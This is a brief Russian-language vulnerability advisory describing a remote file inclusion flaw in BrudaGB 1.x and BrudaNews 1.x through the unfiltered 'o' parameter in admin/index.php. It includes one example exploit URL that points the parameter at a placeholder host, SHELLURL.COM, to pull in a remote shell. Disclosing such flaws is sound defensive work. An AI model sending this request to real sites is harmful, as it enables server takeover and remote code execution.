Программа: BrudaGB 1.x, BrudaNews 1.x

Обнаруженная уязвимость может быть использована для подключения произвольных файлов. Уязвимость существует из-за того, что данные, передаваемые через параметр "o" не правильно обрабатываются в admin/index.php.

Пример:

http://sitename.com/[Script Path]/admin/index.php? o=http://SHELLURL.COM



Оставить мнение